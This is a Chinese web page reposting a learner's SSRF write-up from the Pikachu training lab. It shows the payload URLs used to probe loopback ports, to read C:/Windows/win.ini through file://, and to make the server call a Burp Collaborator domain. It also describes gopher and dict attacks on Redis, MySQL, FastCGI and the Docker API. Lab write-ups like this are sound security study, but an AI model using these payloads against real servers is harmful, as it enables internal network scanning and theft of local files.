新闻详情

新闻详情

首页 / 资讯中心 / 详情

学习渗透测试——SSRF

发布时间:2026/10/2 20:57:42来源:尧图网络
学习渗透测试——SSRF
学习SSRFSSRF服务端请求伪造服务器提供了从远程拉取资源的功能比如图片预览、URL转码、爬虫、获取网页摘要等但又没有对目标地址做严格过滤与限制攻击者传入恶意URL让服务器去访问这个地址很多内网服务默认信任本机访问服务器作为请求发起者可以访问服务器所在内网总结骗服务器干活拿服务器当跳板扫内网。SSRFcurl只有一个可以点击的链接没有任何输入框或选择看一下提示提示要我了解一下curl相关函数用法。·PHP中curl是用来在服务端发起HTTP请求的扩展·curl支持多种协议包括http/https、gopher、dict、file、ftpgopher协议在其中威胁最大能发送任意TCP数据俗称“万能协议”。学习地址https://zhuanlan.zhihu.com/p/2046951452132881344?utm_mediumopenapi_platformutm_sourcee10c3ad29e50接下来开始读诗http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php判断SSRF存在用burp的Collaborator模块获取一个域名kk8wap9xz661r8u37fhaicecu30uomcb.oastify.com尝试让这个ssrf网站访问域名http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlkk8wap9xz661r8u37fhaicecu30uomcb.oastify.com访问成功按Poll now按键后获取到访问请求。证明这里存在SSRF漏洞访问回环地址网页http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1端口探测http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1:3306显示了我的MySQL的版本信息和乱码。内网端口探测成功。读取文件试试file协议http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlfile:///C:/Windows/win.ini显示了我的win.ini文件内容。读取服务器本地文件。SSRFfile_get_content提示要我了解一下file_get_content()相关函数用法。·file_get_content要代码中写了“allow_url_fopen On”才能访问网络URL·file_get_content支持的协议比较少了包括http/https、file、ftp依旧是叫我读诗注意到此时URL结构http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info2.php可以在file...这里做文章访问回环地址网页http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1端口探测http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1:3306探测失败了解后才明白因为3306端口MySQL不认识HTTP请求所以页面会空白http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1:8080探测8080端口时就回显了我的8080端口刚好是BurpSuite在占用读取文件由于file_get_contents支持file://协议尝试读取文件http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filefile:///C:/Windows/win.inigopher:// 协议打内网对比·http只能发 HTTP 请求·gopher他的本质是隧道能发送任意 TCP 报文所以Redis、FastCGI快速通用网关接口默认配置在9000端口、Mysql3306、Memcached缓存系统11211端口、Zabbix Agent监控平台10050端口、Docker APIDocker Daemon监听在2375端口都可以打dict://dict协议只能发文本命令并且会自动补充\r\n可以打redis、简单TCP服务探测内网
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

频率域图像处理核心:傅里叶变换、频域滤波与同态滤波全解析 2026/10/2 21:58:12

频率域图像处理核心:傅里叶变换、频域滤波与同态滤波全解析

数字图像处理这门课,理论上讲,前几章再零碎,大家照着例题还是能把作业写出来的。但到了第四章频率域图像处理,大多数人的反应会突然慢下来:坐标系成了 u、v,图像变成了复数矩阵,之前积累的线性代…

阅读更多 →
YOLOv8垃圾分割检测系统:端到端实例分割实战指南 2026/10/2 21:58:12

YOLOv8垃圾分割检测系统:端到端实例分割实战指南

简介:YOLOv8垃圾分割检测系统是一套面向人工智能初学者与计算机视觉实践者的轻量级垃圾分类解决方案,聚焦图像识别与实例分割任务,适用于智能环卫、环保监测及课程设计等场景。资源包共41个文件,含15张JPG/PNG格式的样本图像、3个…

阅读更多 →
PowerShell禁止运行npm.ps1?一条命令解决Node.js脚本执行策略报错 2026/10/2 21:58:12

PowerShell禁止运行npm.ps1?一条命令解决Node.js脚本执行策略报错

在PowerShell里输入 npm -v ,回车,终端弹出一段红字:“npm : 无法加载文件 D:\nodejs\npm.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 about_Execution_Policies。”这句话我见过太多次了。毫不夸张地说&…

阅读更多 →
Flutter鸿蒙化实战:hider库属性级显隐适配与RenderObject重构 2026/10/2 21:58:12

Flutter鸿蒙化实战:hider库属性级显隐适配与RenderObject重构

做过中后台 Flutter 客户端的朋友应该都有印象:权限点一多,页面里最难看的部分根本不是业务逻辑,而是“这个按钮要不要显示”“这块文案什么时候出现”这类显隐判断。我之前维护的一个运营后台,光 if (user.hasPermission(xxx)) …

阅读更多 →
汽车造型评审的XR头显选型:六大标准与实测指南 2026/10/2 21:58:11

汽车造型评审的XR头显选型:六大标准与实测指南

如果你所在的造型设计团队,目前还在靠大屏渲染图和油泥模型做评审,我可以负责任地告诉你:XR头显带来的信息密度提升是实打实的。1:1沉浸式看车、多方案快速切换、跨地多人评审,这些在几年前还要靠搭十几个显示器或者反复做油泥模型…

阅读更多 →
3x-ui 面板部署实战:从安装到安全加固的完整教程 2026/10/2 21:58:04

3x-ui 面板部署实战:从安装到安全加固的完整教程

3x-ui 这个名字,玩 Linux 服务器的人应该不陌生。最近我又重新部署了一台机器,翻了一圈开源管理面板,最后还是装回了 3x-ui。很多朋友第一次听说它,都是奔着“安装 3x-ui”这个关键词来的,想找一篇能照着一步步做完的文…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞 ✉